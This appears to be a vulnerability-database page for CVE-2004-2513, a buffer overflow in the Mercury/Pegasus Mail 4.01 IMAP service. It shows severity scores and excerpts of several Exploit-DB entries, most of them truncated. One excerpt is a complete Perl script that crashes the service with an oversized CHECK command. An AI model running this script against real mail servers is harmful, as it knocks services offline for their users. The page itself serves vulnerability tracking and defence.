CVE-2004-2513
Published 2004-12-31
CVE-2004-2513: Buffer overflow in the IMAP service of Mercury (Pegasus) Mail 4.01 allows remote attackers to execute arbitrary code via a long SELECT command.
Priority: P3 · 43 · critical · 10 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 9.78% (94.9th percentile)
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pmail | pegasus | — | — |
No detection rules found.
Exploit-DB
Mercury/32 Mail Server 3.32 < 4.51 - SMTP EIP Overwrite
exploitdb·2007-08-26
#include
#include
#include
#pragma comment(lib,"ws2_32")
#include
void usage(char * s);
void logo();
void end_logo();
void prepare_shellcode(unsigned char * fsh, int sh);
void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh);
int send_buffer(unsigned char * buf, unsigned int len, char * remotehost, int port);
SOCKET do_connect (char *remotehost, int port);
void base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len, char * ret) ;
void base64_decode(char const * encoded_string, char * ret) ;
// -----------------------------------------------------------------
// XGetopt.cpp Version 1.2
// -----------------------------------------------------------------
int getopt(int argc, char *argv[], char *optstring);
char *optarg
Exploit-DB
Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
exploitdb·2004-12-01
---
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
#############################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto    => "TCP"))
{
    print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";
    sleep(1);
    print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";
    sleep(1);
    print $socket "0001 CHECK " . "A" x 512 . "\r\n";
    close($socket);
}
else
{
    print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====
# milw0rm.com [2004-12-01]
Exploit-DB
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)
exploitdb·2004-12-01
---
/** Remote Mercury32 Imap exploit [14 types of attacks] WOW!
** By: [email protected]
**
** Notes: Second public release and both of them are Mercury32 ;)
** Again someone posted some DoS code :( why bother?
** If you spent the time to look, it uses the same buffer for all 14 types of attacks and the size does not
** change. I did not check the asm but it's prob using the same routine for all 14 commands.
**
** Date: 12/01/04
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define version "1.0"
int usage(char *p);
Exploit-DB
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)
exploitdb·2004-11-30
---
/* whitehat.co.il comments removed due to muts love */
/** Remote Mercury32 Imap exploit
** By: [email protected]
**/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define version "1.0"
int usage(char *p);
Exploit-DB
Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)
exploitdb·2004-11-29
---
#########################################################
# #
# Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow #
# Discovered by : Muts #
# Coded by : Muts #
# WWW.WHITEHAT.CO.IL #
# Plain vanilla stack overflow in the SELECT command #
# #
#########################################################
import struct
import socket
from time import sleep
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Lame calc.exe shellcode - dont expect miracles!
No writeups or analysis indexed.